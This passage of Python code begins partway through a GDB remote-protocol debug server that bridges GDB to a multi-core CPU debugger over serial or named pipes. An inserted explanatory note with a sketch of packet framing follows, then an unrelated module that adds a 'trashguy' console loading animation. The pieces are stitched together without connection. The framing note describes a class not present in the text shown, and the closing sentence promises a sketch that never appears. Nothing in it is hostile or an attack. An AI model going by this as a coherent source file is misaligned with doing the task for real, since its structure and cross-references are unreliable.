exit flag to CPU queue') self._debugger_disconnected_flag = True self._queue.put('') def _check_flags(self): if self._debugger_disconnected_flag: self._debugger_disconnected_flag = False raise DebuggerDisconnectedException() if self._interrupted_flag: self._interrupted_flag = False raise DebuggerInterruptedException() if self._target_disconnected_flag: self._target_disconnected_flag = False raise TargetDisconnectedException() class CpuDebug: """Communication with Processor Debugger through Serial Port.""" def __init__(self, serial, mcu_name=None): self._serial = serial #self._serial.close() self._cur_addr = None self._auto_inc = None self._core_ctx = {} self._core_id = None self._cores_num = None self._mcu_name = mcu_name self._input_thread = None self._burst_len = 0 self._burst_started = False self._create_input_thread() def get_input_thread(self): return self._input_thread def _create_input_thread(self): self._input_thread = CpuInputThread(self._serial) self._input_thread.name = 'CPU Input' self._input_thread.daemon = True self._input_thread.start() def _read(self, size=1, timeout=5, interruptible=False): result = b'' for i in range(0, size): byte = self._input_thread and self._input_thread.get_byte(timeout, interruptible) if byte == b'': logging.debug('Got interrupt from CPU input queue') if i == 0 and interruptible: return b'' else: logging.warn('Ignoring unexpected interrupt from CPU input queue') byte = self._input_thread and self._input_thread.get_byte(timeout, interruptible) if byte == b'': logging.warn('Got second unexpected interrupt from CPU input queue') result += byte or b'' logging.debug('Read from CPU input queue: %s %s', binascii.hexlify(result).decode('ascii'), binascii.b2a_qp(result)) return result def _write(self, data): self._serial.write(data) def expect_ack(self): ack = self._read() if ack != ACK_CHR: logging.warning('Expected ACK from CPU, got \'%s\' (0x%X)', binascii.b2a_qp(ack), ord(ack or b'\0')) return False return True def set_addr(self, addr): if addr == self._cur_addr: # already there logging.debug('set_addr optimized out') return True assert addr % 4 == 0 self._write(b'a' + struct.pack('>I', addr)) success = self.expect_ack() if success: self._cur_addr = addr else: self._cur_addr = None return success def _inc_addr_after_rw(self): if self._auto_inc: self._cur_addr += 4 elif self._auto_inc is None: self._cur_addr = None def read_mem_word(self): if not self._burst_started: self._write(b'm') if self._burst_len > 0: self._burst_started = True if self._burst_len > 0: self._burst_len -= 4 if self._burst_len == 0: self._burst_started = False logging.debug('Burst finished') res = self._read(4) if len(res) != 4: logging.warning('read_mem failed') self._cur_addr = None return None self._inc_addr_after_rw() return res def write_mem_word(self, word): assert len(word) == 4 if not self._burst_started: self._write(b'w') if self._burst_len > 0: self._burst_started = True self._write(word) if self._burst_len > 0: self._burst_len -= 4 if self._burst_len == 0: self._burst_started = False logging.debug('Burst finished') if self._burst_len == 0: success = self.expect_ack() if not success: logging.warning('write_mem failed') self._cur_addr = None return False self._inc_addr_after_rw() return True def _read_mem_aligned(self, addr, length): if length > 4 and not self.set_auto_inc(True): return None data = b'' for offset in range(0, length, 4): self._setup_burst_mode(addr + offset, length - offset) if not self.set_addr(addr + offset): return None word = self.read_mem_word() if not 
word: return None data += word return data def read_mem(self, addr, length): start_misalignment = addr % 4 start_aligned = addr - start_misalignment end_misalignment = (addr + length) % 4 end_aligned = (addr + length) + (4 - end_misalignment) % 4 data = self._read_mem_aligned(start_aligned, end_aligned - start_aligned) if data: data = data[start_misalignment:] data = data[:length] return data def _write_mem_aligned(self, addr, data): if len(data) > 4 and not self.set_auto_inc(True): return False for offset in range(0, len(data), 4): self._setup_burst_mode(addr + offset, len(data) - offset) if not self.set_addr(addr + offset): return False if not self.write_mem_word(data[offset:offset+4]): return False return True def write_mem(self, addr, data): # Fix start address misalignment start_misalign = addr % 4 start_word = None addr -= start_misalign if not self.set_addr(addr): return False if start_misalign != 0: if not self.set_auto_inc(False): return False start_word = self.read_mem_word() if not start_word: return False data = start_word[:start_misalign] + data # Aligned write assert addr % 4 == 0 end_misalign = len(data) % 4 aligned_len = len(data) - end_misalign if not self._write_mem_aligned(addr, data[:aligned_len]): return False # Fix end address misalignment if end_misalign != 0: end_word_addr = addr + len(data) - end_misalign assert end_word_addr % 4 == 0 if not self.set_addr(end_word_addr): return False if end_word_addr != addr or not start_word: if not self.set_auto_inc(False): return False end_word = self.read_mem_word() if not end_word: return False if not self.set_auto_inc(True): return False else: end_word = start_word data += end_word[end_misalign:] new_end_word = data[aligned_len:] assert len(new_end_word) == 4 if not self.write_mem_word(new_end_word): return False return True def set_auto_inc(self, enabled): if enabled == self._auto_inc: # this autoinc mode is already selected - skip return True if enabled: self._write(b'I') else: self._write(b'i') got_ack = self.expect_ack() if got_ack: self._auto_inc = enabled else: self._auto_inc = None return got_ack def set_core(self, core_id): if core_id == self._core_id: # this core is already selected - skip return True self._write(struct.pack('>B', 160+core_id)) got_ack = self.expect_ack() if got_ack: self._core_id = core_id else: self._core_id = None return got_ack def get_core(self): return self._core_id def free_run(self): self._write(b'f') return self.expect_ack() def step(self): self._write(b's') def break_cpu(self): self._write(b'b') def reset_cpu(self): #self.write_mem(0x30030028, '\0\0\0\1') # remap self._write(b'r') return self.expect_ack() def reset_debugger(self): self._write(b'R') return self.expect_ack() def read_reg(self, idx): return self.read_mem(DEBUG_REGS + idx*4, 4) def read_regs(self): return self.read_mem(DEBUG_REGS, 32*4) def write_regs(self, data): return self.write_mem(DEBUG_REGS, data) def get_pc_reg(self): ctx = self._core_ctx[self._core_id] if ctx: return ctx['addr'] logging.error('PC address is unknown') return None def is_core_active(self, core_id): if core_id in self._core_ctx and self._core_ctx[core_id]: return True return False def get_active_cores(self): return [core_id for core_id in self._core_ctx if self._core_ctx[core_id]] def get_core_ctx(self, core_id): if core_id in self._core_ctx: return self._core_ctx[core_id] return None def set_breakpoint(self, idx, addr): addr_bin = struct.pack('>I', addr) return self.write_mem(DEBUG_BREAKPOINTS + idx*4, addr_bin) def get_breakpoint(self, idx): addr_bin = 
self.read_mem(DEBUG_BREAKPOINTS + idx*4, 4) if not addr_bin: return None addr, = struct.unpack('>I', addr_bin) return addr def set_watchpoint(self, idx, addr): addr_bin = struct.pack('>I', addr) return self.write_mem(DEBUG_WATCHPOINTS + idx*4, addr_bin) def get_watchpoint(self, idx): addr_bin = self.read_mem(DEBUG_WATCHPOINTS + idx*4, 4) if not addr_bin: return None addr, = struct.unpack('>I', addr_bin) return addr def _read_core_context(self): core_id_raw = self._read() core_id = ord(core_id_raw) is_working = (core_id & 0x80) == 0 core_id &= 0x7F if is_working: ctx = {} addr_bin = self._read(4) addr, = struct.unpack('>I', addr_bin) ctx['addr'] = addr instr = self._read(4) instr_str = binascii.hexlify(instr) ctx['instr'] = instr result, = struct.unpack('>I', self._read(4)) data, = struct.unpack('>I', self._read(4)) lsaddr, = struct.unpack('>I', self._read(4)) ldata, = struct.unpack('>I', self._read(4)) ctx['lsaddr'] = lsaddr if instr_str[0:4] == b'dead': logging.warning('Core %d is executing 16-bit instruction at 0x%X: %s', core_id, addr, instr_str[4:]) else: logging.info('Core %d is executing instruction at 0x%X: %s', core_id, addr, instr_str) logging.info(' result 0x%X data 0x%X lsaddr 0x%X ldata 0x%X', result, data, lsaddr, ldata) else: ctx = None logging.info('Core %d is halted', core_id) return core_id, ctx def wait_for_context(self, timeout=None, first_ch=None, interruptible=False): idx = 0 max_core_id = -1 while not self._cores_num or idx < self._cores_num: # Read first character if first_ch: ch = first_ch first_ch = None else: ch = self._read(timeout=timeout, interruptible=interruptible) if not ch: # Timeout or interrupt if idx > 0: if not self._cores_num: # Timeout was expected - now we know number of cores self._cores_num = max_core_id + 1 logging.info('Number of cores: %d', self._cores_num) break else: logging.warning('Timeout when reading context') else: logging.debug('Timeout when waiting for context') return False if ch != b'~': logging.warning('Expected \'~\' from CPU, got \'%s\' (0x%X)', binascii.b2a_qp(ch), ord(ch or b'\0')) continue core_id, ctx = self._read_core_context() self._core_ctx[core_id] = ctx max_core_id = max(max_core_id, core_id) idx += 1 # Change timeout for next cores timeout = 0.1 interruptible = False return True def break_for_context(self): # check if there is any data available logging.debug('Checking if context was already sent') if self.wait_for_context(0.1): logging.debug('Got context before sending break') return # check if processor is running logging.debug('Checking processor state') self._write(b'B') ch = self._read(timeout=1) if not ch: # fallback to old method if 'B' is not supported self._write(b's') ch = self._read(timeout=1) if ch == ACK_CHR or not ch: # ACK after 'B' or timeout after 's' - processor is running logging.debug('Processor is running - halting') self._write(b'b') ch = None logging.debug('Processor is halted - read context data') self.wait_for_context(None, ch) def _setup_burst_mode(self, addr, length): # Burst mode makes sense only if auto-increment is enabled if not self._auto_inc: return # Check if burst mode is already active if self._burst_len != 0: return # Calculate actual burst length and check if it is bigger than one word next_reg_addr = addr - addr % MEM_REGION_ALIGNMENT + MEM_REGION_ALIGNMENT burst_len = min(length, MAX_BURST_LEN, next_reg_addr - addr) if burst_len <= 4: return # Seek to burst count register burst_len_bin = struct.pack('>I', burst_len) self.set_addr(DEBUG_BURST_COUNT) # Write burst length into the 
register self.write_mem_word(burst_len_bin) # Remember burst length for later - it will be decremented when reading/writing words self._burst_len = burst_len # Burst is considered started after first command (e.g. 'm') is sent to the debug chip self._burst_started = False logging.debug('Enabled burst mode (addr 0x%X, length %d)', addr, burst_len) class DbgBridge: """Handles GDB Remote Protocol commands and convert them to CC Processor Debugger commands.""" def __init__(self, gdb_conn, cpu_dbg): self._gdb_conn = gdb_conn self._cpu_dbg = cpu_dbg self._breakpoints = [None] * BREAKPOINTS_NUM self._watchpoints = [None] * WATCHPOINTS_NUM # use SIGTRAP by default; GDB expects it after 'step' command self._sig = SIGTRAP self._gdb_sync = False def cmd_read_regs(self): logging.info('Reading registers...') gregs = self._cpu_dbg.read_regs() pc = self._cpu_dbg.get_pc_reg() or 0 status = self._cpu_dbg.read_mem(0x3003000, 4) #epc = self._cpu_dbg.read_mem(0x3003004, 4) # current PC is more useful cause = self._cpu_dbg.read_mem(0x3003008, 4) badaddr = self._cpu_dbg.read_mem(0x300300C, 4) if not gregs or not status or not cause or not badaddr: logging.error('Failed to read registers') return b'E01' regs_hex = b'' regs_hex += binascii.hexlify(gregs) regs_hex += binascii.hexlify(status) regs_hex += b'00000000' * 2 # lo, hi regs_hex += binascii.hexlify(badaddr) regs_hex += binascii.hexlify(cause) regs_hex += '{0:08X}'.format(pc).encode('ascii') regs_hex += b'00000000' * 32 # floating point registers regs_hex += b'00000000' * 2 # fsr, fir registers return regs_hex def cmd_write_regs(self, arg): regs = binascii.unhexlify(arg) gregs = regs[:32*4] pc_bin = regs[(32+5)*4:(32+6)*4] pc, = struct.unpack('>I', pc_bin) if pc == 0: # GDB wants to restart program - reset processor logging.info('Resetting processor...') self._cpu_dbg.reset_cpu() self._cpu_dbg.break_cpu() self._cpu_dbg.wait_for_context() return b'OK' else: logging.info('Writing registers...') # Note: pc cannot be changed in processor yet if self._cpu_dbg.write_regs(gregs): return b'OK' else: logging.error('Failed to write registers') return b'E01' def cmd_read_mem(self, arg): i = arg.index(b',') addr = int(arg[:i], 16) length = int(arg[i+1:], 16) if length == 0: return '' data = self._cpu_dbg.read_mem(addr, length) if not data: return b'E01' data_hex = binascii.hexlify(data) logging.info('Read %d bytes from 0x%08X: %s', length, addr, data_hex) return data_hex def cmd_write_mem(self, arg): i = arg.index(b',') j = arg.index(b':') addr = int(arg[:i], 16) length = int(arg[i+1:j], 16) data_hex = arg[j+1:] data = binascii.unhexlify(data_hex) if length == 0: return '' if len(data) != length: logging.error('Invalid length field in write_mem command') logging.info('Wrote %d bytes at 0x%08X: %s', length, addr, data_hex) if self._cpu_dbg.write_mem(addr, data): return b'OK' else: return b'E01' def cmd_write_mem_bin(self, arg): i = arg.index(b',') j = arg.index(b':') addr = int(arg[:i], 16) length = int(arg[i+1:j], 16) data = arg[j+1:] if len(data) != length: logging.error('Invalid length field in write_mem_bin command %d %d', len(data), length) logging.info('Writing %d bytes at 0x%08X: %s', len(data), addr, binascii.hexlify(data)) if self._cpu_dbg.write_mem(addr, data): if len(data) > 1024: logging.info('Writing operation finished!') return b'OK' else: return b'E01' def cmd_insert_breakpoint(self, arg): args = arg.split(b',') t = args[0] addr = int(args[1], 16) length = int(args[2], 16) logging.info('Inserting breakpoint: type %s addr 0x%08X len %d', t, addr, length) 
found = False success = False if t in [b'0', b'1']: # software/hardware breakpoint for i in range(0, BREAKPOINTS_NUM): if self._breakpoints[i] is None: found = True success = self._cpu_dbg.set_breakpoint(i, addr) if success: self._breakpoints[i] = addr break elif t in [b'2', b'3', b'4']: # watchpoint (write, read, access) for i in range(0, WATCHPOINTS_NUM): if self._watchpoints[i] is None: found = True success = self._cpu_dbg.set_watchpoint(i, addr) if success: self._watchpoints[i] = addr break else: logging.error('Unsupported breakpoint type %s!', t) return '' if success: return b'OK' elif not found: logging.warning('Empty slot for breakpoint not found') else: logging.error('Failed to set breakpoint') return b'E01' def cmd_remove_breakpoint(self, arg): args = arg.split(b',') t = args[0] addr = int(args[1], 16) length = int(args[2], 16) logging.info('Removing breakpoint: type %s addr 0x%08X len %d', t, addr, length) found = False success = False if t in [b'0', b'1']: # software/hardware breakpoint for i in range(0, BREAKPOINTS_NUM): if self._breakpoints[i] == addr: found = True success = self._cpu_dbg.set_breakpoint(i, 0xFFFFFFFF) if success: self._breakpoints[i] = None break elif t in [b'2', b'3', b'4']: # watchpoint (write, read, access) for i in range(0, WATCHPOINTS_NUM): if self._watchpoints[i] == addr: found = True success = self._cpu_dbg.set_watchpoint(i, 0xFFFFFFFF) if success: self._watchpoints[i] = None break else: logging.error('Unsupported breakpoint type %s!', t) return b'' if success: return b'OK' elif not found: logging.error('Breakpoint not found') else: logging.error('Failed to remove breakpoint') return b'E01' def cmd_continue(self, arg): if len(arg) != 0: logging.warning('Ignoring continue address!') logging.info('Continue...') self._cpu_dbg.free_run() def cmd_step(self, arg): if len(arg) != 0: logging.warning('Ignoring step address!') logging.info('Step') self._cpu_dbg.step() def cmd_detach(self): logging.info('GDB detached.') self._cpu_dbg.free_run() return b'OK' def cmd_remote_command(self, arg): cmd = binascii.unhexlify(arg) logging.info('Remote command: %s', cmd) if cmd == b'reset halt': old_bp = self._cpu_dbg.get_breakpoint(0) # Stop as early as possible (address 0) self._cpu_dbg.set_breakpoint(0, 0) self._cpu_dbg.reset_cpu() self._cpu_dbg.break_cpu() self._cpu_dbg.wait_for_context() self._cpu_dbg.set_breakpoint(0, old_bp if old_bp else 0xFFFFFFFF) self.select_best_core() return b'OK' elif cmd == b'reset run': self._cpu_dbg.reset_cpu() return b'OK' elif cmd.startswith(b'delay '): ms = int(cmd[6:]) time.sleep(ms / 1000) return b'OK' elif cmd == b'halt': self._cpu_dbg.break_cpu() self._cpu_dbg.wait_for_context() self.select_best_core() return b'OK' elif cmd.startswith(b'core '): core_id = int(cmd[5:]) logging.info('Changing core to %d', core_id) self._cpu_dbg.set_core(core_id) return b'OK' elif cmd == b'gdb_sync': # Fake next stepi command so it does not step but return current address # This is useful to sync GDB state after monitor halt command self._gdb_sync = True return b'OK' logging.warn('Unknown command: %s', cmd) return b'' def get_exception_info(self): # Note: T packet allows GDB for not reading all registers repl = 'T{0:02X}'.format(self._sig) # GDP frequently needs SP, FP, RA and PC registers logging.debug('Reading registers...') for idx in [29, 30, 31]: reg_bin = self._cpu_dbg.read_reg(idx) reg, = struct.unpack('>I', reg_bin) repl += '{0:02X}:{1:08X};'.format(idx, reg) pc = self._cpu_dbg.get_pc_reg() or 0 repl += '{0:02X}:{1:08X};'.format(37, pc) # PC repl 
+= 'thread:{0:08X};'.format(self._cpu_dbg.get_core() + 1) # current core return repl.encode('ascii') def find_best_core(self, hint): best_core_id = hint # check if any core is halted on breakpoint for core_id in self._cpu_dbg.get_active_cores(): ctx = self._cpu_dbg.get_core_ctx(core_id) if not ctx: continue if ctx['instr'] == BREAK_OPCODE: best_core_id = core_id logging.debug('Break instruction detected!') elif ctx['addr'] in self._breakpoints: best_core_id = core_id logging.debug('Halted on hw breakpoint!') elif not self._cpu_dbg.is_core_active(best_core_id): # if current core is halted, switch to first active best_core_id = core_id # if no core is running, use 0 if not self._cpu_dbg.is_core_active(best_core_id): best_core_id = 0 return best_core_id def select_best_core(self): best_core_id = self.find_best_core(self._cpu_dbg.get_core()) if best_core_id != self._cpu_dbg.get_core(): logging.info('Selecting best core %d', best_core_id) self._cpu_dbg.set_core(best_core_id) def setup_debugger(self): if not self._setup_done: # Initial setup logging.info('Initializing debugger') self._cpu_dbg.set_auto_inc(True) # Setup breakpoints and watchpoints to address which cannot be accessed # Note: reset_debugger() is not used because it unbreaks processor for i in range(0, BREAKPOINTS_NUM): self._cpu_dbg.set_breakpoint(i, 0xFFFFFFFF) for i in range(0, WATCHPOINTS_NUM): self._cpu_dbg.set_watchpoint(i, 0xFFFFFFFF) # Select core best_core_id = self.find_best_core(0) self._cpu_dbg.set_core(best_core_id) self._setup_done = True logging.debug('Initialized.') def handle_gdb_packet(self, data): logging.debug('Handling GDB packet: %s', data) repl = b'' exit = False cmd = data[0:1] arg = data[1:] if cmd == b'?': # last exception number self._cpu_dbg.break_for_context() self.setup_debugger() repl = self.get_exception_info() elif cmd == b'c': # cAA..AA: Continue at address AA..AA(optional) self.cmd_continue(arg) self.wait_for_exception() repl = self.get_exception_info() elif cmd == b's': # Step one instruction from AA..AA(optional) if self._gdb_sync: self._gdb_sync = False else: self.cmd_step(arg) self.wait_for_exception() repl = self.get_exception_info() elif cmd == b'g': # return the value of the CPU registers repl = self.cmd_read_regs() elif cmd == b'G': # set the value of the CPU registers - return OK repl = self.cmd_write_regs(arg) elif cmd == b'm': # mAA..AA,LLLL: Read LLLL bytes at address AA..AA repl = self.cmd_read_mem(arg) elif cmd == b'M': # MAA..AA,LLLL: Write LLLL bytes at address AA.AA return OK repl = self.cmd_write_mem(arg) elif cmd == b'X': # XAA..AA,LLLL: Write LLLL bytes at address AA.AA return OK repl = self.cmd_write_mem_bin(arg) elif cmd == b'Z': # insert breakpoint repl = self.cmd_insert_breakpoint(arg) elif cmd == b'z': # remove breakpoint repl = self.cmd_remove_breakpoint(arg) elif cmd == b'D': # detach repl = self.cmd_detach() exit = True elif cmd == b'q': args = re.split(b'[,:]', arg) if args[0] == b'Rcmd': # monitor command repl = self.cmd_remote_command(args[1]) elif args[0] == b'Supported': repl = b'PacketSize=1400;QStartNoAckMode+' elif args[0] == b'Offsets': repl = b'Text=0;Data=0;Bss=0' elif args[0] == b'C': # current thread # Note: GDB thread IDs starts from 1 core_id = self._cpu_dbg.get_core() repl = b'QC{0}'.format(core_id + 1) elif args[0] == b'Symbol': repl = b'OK' # no symbol is needed elif args[0] == b'Attached': repl = b'1' # attached to device (no process has been created) elif args[0] == b'fThreadInfo': cores = self._cpu_dbg.get_active_cores() repl = b'm' + 
b','.join([str(i+1).encode('ascii') for i in cores]) logging.info('Returning thread list: %s', repl) elif args[0] == b'sThreadInfo': repl = b'l' # end of list elif args[0] == b'ThreadExtraInfo': thread_id = int(args[1]) repl = binascii.hexlify('core {0}'.format(thread_id - 1).encode('ascii')) else: logging.warning('Unknown GDB packet: %s', data) elif cmd == b'Q': # set args = re.split(b'[,:]', arg) if args[0] == b'StartNoAckMode': logging.debug('Starting no-ack mode') self._gdb_conn.start_no_ack_mode() repl = b'OK' else: logging.warning('Unknown GDB packet: %s', data) elif cmd == b'H': # set thread op = arg[0] thread_id = int(arg[1:]) if thread_id in [-1, 0]: # all cores - ignore repl = b'OK' else: core_id = thread_id - 1 if self._cpu_dbg.is_core_active(core_id): self._cpu_dbg.set_core(core_id) logging.info('GDB changed core to %d (op %s)', core_id, op) repl = b'OK' else: logging.warning('Invalid thread ID in %s', data) repl = b'E01' elif cmd == b'T': # check if thread is alive core_id = int(arg) - 1 active = self._cpu_dbg.is_core_active(core_id) repl = b'OK' if active else b'E01' else: logging.warning('Unknown GDB packet: %s', data) # Send reply logging.debug('Handled GDB packet %s - reply %s', data, repl) self._gdb_conn.send_packet(repl) return not exit def wait_for_exception(self): logging.info('Waiting for exception...') interruptible = True self._sig = SIGTRAP while True: logging.debug('Waiting for context...') try: if self._cpu_dbg.wait_for_context(interruptible=interruptible): break except DebuggerInterruptedException: logging.info('Interrupted...') interruptible = False self._sig = SIGINT self._cpu_dbg.break_cpu() logging.info('CPU stopped') self.select_best_core() def run(self): self._setup_done = False self._cpu_dbg.break_cpu() while True: try: data = self._gdb_conn.get_packet() if not data: logging.debug('Got no packet') return if not self.handle_gdb_packet(data): logging.info('Detaching') return except DebuggerDisconnectedException: logging.info('Debugger disconnected') return except TargetDisconnectedException: logging.info('Target disconnected') return class GdbLoggingHandler(logging.Handler): def __init__(self, gdb_conn): logging.Handler.__init__(self) self._gdb_conn = gdb_conn def emit(self, record): log_entry = self.format(record) self._gdb_conn.send_packet(b'O ' + log_entry.encode('utf-8')) class PipePair(): def __init__(self, read_pipe_name, write_pipe_name): # Note: server connects read pipe first so use reversed order here self._write_pipe = open(write_pipe_name, 'wb', buffering=0) if os.name == 'nt': # On Windows client cannot open pipe until server calls ConnectNamedPipe. # Simulator uses two pipes and it calls ConnectNamedPipe synchronously so we have to wait util second pipe is available. # In C app WaitNamedPipe should be used. Standard Python does not have API for that so wait 100ms instead. 
time.sleep(0.1) self._read_pipe = open(read_pipe_name, 'rb', buffering=0) def write(self, *args, **kwargs): res = self._write_pipe.write(*args, **kwargs) return res def read(self, *args, **kwargs): res = self._read_pipe.read(*args, **kwargs) return res def close(self): self._read_pipe.close() self._write_pipe.close() class Options: def __init__(self): self.gdb_port = GDB_PORT self.unix_socket = None self.dbg_port = DBG_PORT self.dbg_baudrate = DBG_BAUDRATE self.log_level = logging.INFO self.log_filename = None self.debug_proto_log_path = None self.mcu_name = 'ml605' self.pipe = False def _show_help(self): print('Usage: dbgserver.py [OPTIONS]\n') print('Options:') print(' -p, --port=DBG_PORT path to debug port device') print(' (default: {0})'.format(DBG_PORT)) print(' -b, --baudrate=BAUDRATE debug port baudrate (default: {0})'.format(DBG_BAUDRATE)) print(' -g, --gdbport=TCP_PORT listen on TCP port for GDB connection') print(' (default: {0})'.format(GDB_PORT)) print(' -u, --unix-socket=FILE use Unix domain socket for GDB connection') print(' --pipe use standard streams for GDB connection') print(' -l, --log=LEVEL logging level - one of: DEBUG, INFO (default),') print(' WARNING, ERROR, CRITICAL') print(' -o, --log-file=FILE log to FILE') print(' --debug-proto-log=FILE log debug proto to FILE (slow)') print(' --mcu=ml605|ccnv1 enable compatibility with mcu') def parse(self, argv): opts, args = getopt.getopt(argv, 'hp:b:g:u:l:o:', ['help', 'port=', 'baudrate=', 'gdbport=', 'unix-socket=', 'log=', 'log-file=', 'debug-proto-log=', 'mcu=', 'pipe']) for opt, arg in opts: if opt in ('-h', '--help'): self._show_help() sys.exit(0) elif opt in ('-p', '--port'): self.dbg_port = arg elif opt in ('-b', '--baudrate'): self.dbg_baudrate = int(arg) elif opt in ('-g', '--gdbport'): self.gdb_port = int(arg) elif opt in ('-u', '--unix-socket'): self.unix_socket = arg elif opt in ('--pipe'): self.pipe = True elif opt in ('-l', '--log'): self.log_level = getattr(logging, arg.upper()) if not isinstance(self.log_level, int): raise ValueError('Invalid log level: %s' % arg) elif opt in ('-o', '--log-file'): self.log_filename = arg elif opt in ('--debug-proto-log'): self.debug_proto_log_path = arg elif opt in ('--mcu'): if arg not in ('ml605', 'ccnv1'): raise ValueError('Invalid mcu name: %s' % arg) self.mcu_name = arg def create_socket_for_gdb(opts): # Setup socket for GDB connection if opts.pipe: return None elif not opts.unix_socket: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(('', opts.gdb_port)) logging.info('Listening on TCP port %d...', opts.gdb_port) else: if os.path.exists(opts.unix_socket): st = os.stat(opts.unix_socket) if st and stat.S_ISSOCK(st.st_mode): os.unlink(opts.unix_socket) sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) sock.bind(opts.unix_socket) logging.info('Listening on unix socket %s...', opts.unix_socket) if not opts.pipe: sock.listen(5) return sock def create_dbg_stream(opts): # Check if dbg_port is valid if opts.debug_proto_log_path: logging.warning('Logging debug protocol may slow down the debug server!') if opts.dbg_port.startswith('pipe:'): dbg_pipe_name = opts.dbg_port.split(':')[1] logging.debug('Connecting to debug pipe...') pipe_name_prefix = '\\\\.\\pipe\\' if os.name == 'nt' else '' read_pipe_name = pipe_name_prefix + dbg_pipe_name + '.out' write_pipe_name = pipe_name_prefix + dbg_pipe_name + '.in' dbg_stream = PipePair(read_pipe_name, write_pipe_name) logging.info('Connected to debug pipe 
%s', dbg_pipe_name) else: # HACK: On Linux if dsrdtr is disabled pyserial always does TIOCMBIS ioctl to set DTR which fails for socat # created devices. Enabled dsrdtr seems to not harm communication with real hardware. # On Windows enabled dsrdtr breaks debugging real hardware so it needs to be disabled there. dsrdtr = (os.name != 'nt') # Note: pyserial doesnt detect port closing when reading data from another thread without timeout dbg_stream = serial.Serial(port=opts.dbg_port, baudrate=opts.dbg_baudrate, rtscts=False, dsrdtr=dsrdtr) logging.info('Connected to debug port %s (baudrate %d)', opts.dbg_port, opts.dbg_baudrate) dbg_stream = StreamLoggingWrapper(dbg_stream, opts.debug_proto_log_path) return dbg_stream def main(argv): # Parse command line arguments opts = Options() opts.parse(argv) if opts.pipe: # Ignore SIGINT in pipe mode signal.signal(signal.SIGINT, signal.SIG_IGN) # Setup logging #logging.basicConfig(level=log_level, format='%(levelname)s: %(message)s', filename=log_filename, filemode='w') logging.srcfile = None logging.logThreads = 0 logging.logProcesses = 0 logging.getLogger().setLevel(opts.log_level) formatter = logging.Formatter('%(levelname)s: %(message)s') ch = logging.StreamHandler() # uses stderr ch.setFormatter(formatter) if opts.pipe: ch.setLevel(logging.ERROR) logging.getLogger().addHandler(ch) if opts.log_filename: fh = logging.FileHandler(opts.log_filename) fh.setFormatter(formatter) logging.getLogger().addHandler(fh) # Install exception handler # Note: it does not work in threads: https://bugs.python.org/issue1230540 def exception_handler(exc_type, exc_value, exc_traceback): if issubclass(exc_type, KeyboardInterrupt): sys.__excepthook__(exc_type, exc_value, exc_traceback) return logging.critical('Uncaught exception', exc_info=(exc_type, exc_value, exc_traceback)) sys.excepthook = exception_handler sock = create_socket_for_gdb(opts) dbg_stream = create_dbg_stream(opts) cpu_dbg = CpuDebug(dbg_stream, opts.mcu_name) try: while True: if not opts.pipe: logging.info('Waiting for GDB client...') client, addr = sock.accept() # GDB client connected logging.info('GDB client connected: %s', addr) else: client = None gdb_conn = GdbConn(client, cpu_dbg.get_input_thread()) bridge = DbgBridge(gdb_conn, cpu_dbg) if opts.pipe and False: gdb_handler = GdbLoggingHandler(gdb_conn) logging.getLogger().addHandler(gdb_handler) try: bridge.run() except serial.SerialException as e: logging.exception('Serial exception') except socket.error as e: logging.exception('Socket error') if client: client.close() logging.info('GDB client disconnected.') if opts.pipe: break except KeyboardInterrupt: logging.info('Exiting...') logging.debug('Closing debug stream...') cpu_dbg.get_input_thread().closing = True if os.name == 'nt' and opts.dbg_port.startswith('pipe:'): # HACK: On Windows closing pipe does not interrupt read request on a pipe. # To workaround it send a basic command to MCU to make it respond with something and wake up # the input thread. dbg_stream.write(b'I') try: dbg_stream.close() except Exception as e: logging.warn('Exception when closing debug stream: %s', e) logging.debug('Closed debug stream.') if opts.unix_socket: os.unlink(opts.unix_socket) if opts.pipe: # Wait a moment so GDB has chance to read last packets. Not sleeping causes GDB error on Windows. time.sleep(0.1) logging.debug('Exiting from main thread') if __name__ == '__main__': main(sys.argv[1:])
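
GdbConn above frames replies using GDB Remote Serial Protocol packets: '$' + payload + '#' + a two-hex-digit checksum (the payload byte sum modulo 256), with special bytes in binary payloads escaped as 0x7D followed by the original byte XOR 0x20. As a quick reference, here is a minimal standalone sketch of that framing, assuming Python 3 only (the server itself also keeps Python 2 compatibility):

# Minimal sketch of the RSP framing used by GdbConn above (Python 3 only).
import re

def rsp_frame(payload: bytes) -> bytes:
    # Checksum is the payload byte sum modulo 256, rendered as two hex digits.
    checksum = sum(payload) % 256
    return b'$' + payload + b'#' + ('%02X' % checksum).encode('ascii')

def rsp_unescape(data: bytes) -> bytes:
    # Undo the 0x7D escape applied to special bytes in binary payloads.
    pattern = re.compile(b'\x7D(.)', flags=re.DOTALL)
    return pattern.sub(lambda m: bytes((m.group(1)[0] ^ 0x20,)), data)

if __name__ == '__main__':
    assert rsp_frame(b'OK') == b'$OK#9A'
    assert rsp_unescape(b'\x7D\x03') == b'#'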
__init__.py
import threading
import time
from functools import wraps

from trashguy import TrashGuy


class Anim:
    def __init__(self, text: str = 'Loading', speed: float = 0.2):
        self.text: str = text
        self.speed: float = speed
        self.thread: threading.Thread = threading.Thread()
        self.trash_anim: TrashGuy = TrashGuy(self.text)
        self.frame_list: list = list(self.trash_anim)
        self.animate: bool = True

    def _start(self):
        # Iterate over a snapshot so popping consumed frames does not skip entries.
        for frame in list(self.frame_list):
            if not self.animate:
                break
            print(frame, end='', flush=True)
            time.sleep(self.speed)
            print(f'\x1b[1K\x1b[{len(frame) ** 2}D', end='')
            self.frame_list.pop(0)
        return

    def _get_last_frame(self):
        return self.frame_list[0] if len(self.frame_list) != 0 else []

    def start(self):
        self.thread = threading.Thread(target=self._start)
        self.thread.start()
        return

    def stop(self):
        self.animate = False
        return


def animate(text: str = 'LOADING', speed: float = 0.02):
    """Decorator for adding a trashguy animation to long-running functions.

    Args:
        text (str): String reference to trash items.
        speed (float): Number of seconds each cycle of animation takes.

    Examples:
        import trash_anim

        @trash_anim.animate(text='LOADING', speed=1)
        def test():
            import time
            time.sleep(10)
            print('\nDone')
    """
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            anim = Anim(text=text, speed=speed)
            anim.start()
            try:
                ret = func(*args, **kwargs)
            finally:
                anim.stop()
            return ret
        return wrapper
    return decorator
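
The Anim/animate pair above follows a common pattern: run a console animation on a background thread while the decorated function executes, then stop it via a shared flag in a finally block. Below is a dependency-free sketch of the same pattern; it does not use TrashGuy, and the spinner characters are placeholder frames:

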